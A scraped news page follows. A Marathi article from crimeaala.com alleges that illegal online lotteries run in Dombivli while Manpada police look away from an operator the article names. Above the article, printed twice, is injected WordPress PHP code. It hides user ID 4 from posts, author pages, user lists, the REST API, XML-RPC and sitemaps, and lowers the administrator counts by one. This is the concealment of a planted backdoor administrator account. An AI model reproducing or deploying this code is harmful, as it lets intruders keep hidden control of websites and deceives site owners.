add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
अवैध ऑनलाईन लॉटऱ्याचा धुमाकूळ; मानपाडा पोलिसांचे दुर्लक्ष… - crimeaala.com
दि. १(डोंबिवली ): डोंबिवली शहर आणि परिसरात अवैध ऑनलाईन लॉटऱ्या जोरात चालू आहेत. पण डोंबिवलीतील स्थानिक पोलीस या अवैध, दोन नंबरच्या धंद्यांकडे कानाडोळा करताना दिसत आहेत. दिवस रात्र या लॉटऱ्याच्या दुकानात सामान्य माणसांची गर्दी पाहायला मिळते.
डोंबिवलीतील मानपाडा पोलीस स्टेशनच्या हद्दीत तर लॉटरी माफिया शंकर अहुजा याने स्वतःचा अॅप तयार करून ऑनलाईनच्या नावाखाली बेकायदेशीरपणे लॉटरीचा गोरख धंदा सुरू केला आहे. यामुळे सरकारचा कोट्यवधी रूपयांचा महसूल बुडवला जात आहे. तर दुसरीकडे लॉटरीच्या माध्यमातून केवळ माफियांनाच फायदा होत असल्याने लॉटरी खेळणारी अनेक कुटुंब देशोधडीला लागत चालली आहेत.
राज्यात ऑनलाइन लॉटरीवर बंदी असतानाही, त्यात मुंबईला अर्थसंकल्पीय अधिवेशन चालू आहे तरीही मानपाडा पोलीस स्टेशनच्या हद्दीत ऑनलाईन लॉटरी जोरात चालू आहे. अवैध ऑनलाईन लॉटऱ्या सुरु असल्याची सर्व माहिती मानपाडा पोलीस ठाण्याचे वरिष्ठ पोलीस निरीक्षक संदीपान शिंदे यांना माहिती आहे तरीही ते याकडे जाणीवपूर्वक दुर्लक्ष करत आहेत.
अवैध लॉटरी चालवणारा चालक मालक माफिया शंकर अहुजा ला वरिष्ठ पोलीस निरीक्षक संदीपान शिंदे पाठीशी घालत आहेत का? लॉटऱ्याचा धंदा करण्यासाठी खुलेआम मदत करत आहेत का? जर मदत करत नसतील तर अवैध लॉटरी चालवणारा चालक मालक माफिया शंकर अहुजा यावर कारवाई का होत नाहीये? असा प्रश्न नागरिकांना पडला आहे.
दिवसरात्र चालणाऱ्या या लॉटरीच्या नादात अनेक तरुण, नोकरदार, बिगारी काम करणारे, नशेच्या आहारी गेलेली लोक कमी वेळेत जास्त पैसे कमावण्याच्या आमिषाला बळी पडून आपली कष्टाची कमाई या जुगारात गमावत आहेत. याचा थेट परिणाम त्यांच्या कौटुंबिक जीवनावर होत असून, अनेक कुटुंबे रस्त्यावर आली आहेत.
या गंभीर प्रकाराकडे ठाणे आयुक्त, कल्याण उप आयुक्त, सहाय्यक पोलीस आयुक्त यांनी तातडीने लक्ष घालून, या अवैध लॉटरी सेंटर चालवणाऱ्या चालक मालक शंकर अहुजा याच्यावरती ताबडतोब कारवाई करावी तसेच त्याला मदत करणाऱ्या असलेल्या पोलीस अधिकाऱ्यांचीही चौकशी करून, दोषींवर कारवाई करण्यात यावी अशी मागणी जोर धरत आहे.